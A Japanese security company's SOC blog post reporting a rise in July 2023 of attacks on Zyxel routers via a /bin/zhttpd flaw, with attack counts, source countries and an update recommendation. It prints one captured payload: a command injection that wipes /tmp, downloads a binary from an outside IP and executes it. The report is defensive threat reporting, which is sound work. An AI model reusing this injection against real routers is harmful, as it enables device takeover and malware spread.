ニュース
お知らせプレスリリースメディア掲載イベント JVN セキュリティコンテスト
ソリューション
- セキュリティ診断
  
  Webアプリケーション
  
  スマートフォンアプリケーション診断
  
  IoTセキュリティ診断(組み込み機器診断)
  
  ペネトレーションテスト
  
  ネットワーク診断(プラットフォーム診断)
  
  TLPT支援(脅威ベースペネトレーションテスト支援)
  
  要塞化支援サービス
  
  AI×セキュリティ
  
  ICSセキュリティ・リスクアセスメント
- Webサイト管理ソリューション
  
  ここから始まる脆弱性管理CAAV
- セキュリティ・コンサルティング
  
  情報セキュリティ推進組織支援
  
  CSIRT構築支援
  
  リスクアセスメント
  
  事業継続
  
  スレットインテリジェンス
  
  Splunk導入支援
  
  集団防衛型Threat Hunting
  
  トポロジーデータ分析（TDA）
選ばれる理由
採用情報
採用トップ新卒採用キャリア採用

SOLUTIONS

セキュリティ・コンサルティング

選ばれる理由

ブログ / リサーチ

ニュース

会社概要

採用情報

ENGLISH

利用規約個人情報保護方針情報セキュリティ基本方針ソーシャルメディアガイドライン当社から外部への情報提供ポリシー

2023.08.15

監視

2023年7月度 MBSD-SOCの検知傾向トピックス

Zyxel製ルータの脆弱性を狙った攻撃

　今月は、Zyxel製ルータの脆弱性を狙った攻撃が増加しました。Zyxelルータの/bin/zhttpdコンポーネントの脆弱性を狙った攻撃となっており、攻撃者にリモートから任意のコードを実行されてしまう恐れがあります。

　下図は、今年6月から7月末までの本脆弱性を狙った攻撃数の推移です。弊社SOCでは、2022年12月17日の初観測以降は、断続的に攻撃を観測していましたが、6月の中旬以降に攻撃が増加しています。

図. Zyxel製ルータの脆弱性を狙った攻撃の検知数推移（2023/6/1~7/31）

　下図は、弊社SOCで実際に検知した攻撃のパケットペイロードです。wgetコマンドで不正なファイルを取得して実行を試みた通信となっています。本脆弱性の対象は、Zyxel製の複数のルータが対象となっています。該当製品を利用している場合は、最新のバージョンにアップデートすることをお勧めします。

図. Zyxel製ルータの脆弱性を狙った攻撃の検知例
GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103[.]110[.]33[.]164/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;

　6月および7月における本攻撃の攻撃元国の上位5件は以下の通りです。韓国からの攻撃が多くなっていました。

表. Zyxel製ルータの脆弱性を狙った攻撃国上位5件（2023年6月～7月）
#	6月		7月
1	韓国	40.3%	韓国	43.6%
2	中国	14.3%	アメリカ	19.5%
3	アメリカ	13.3%	日本	8.9%
4	香港	10.8%	ベネズエラ	4.5%
5	日本	10.0%	イタリア	3.7%

参考情報

Zyxel security advisory for remote code execution and denial-of-service vulnerabilities of CPE
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-code-execution-and-denial-of-service-vulnerabilities-of-cpe

MBSD-SOC

シェアする

ツイートする

関連記事

2023年6月度 MBSD-SOCの検知傾向トピックス

2023年6月度のMBSD-SOCにおける検知傾向トピックスです。

2023年5月度 MBSD-SOCの検知傾向トピックス

2023年5月度のMBSD-SOCにおける検知傾向トピックスです。

記事一覧へ戻る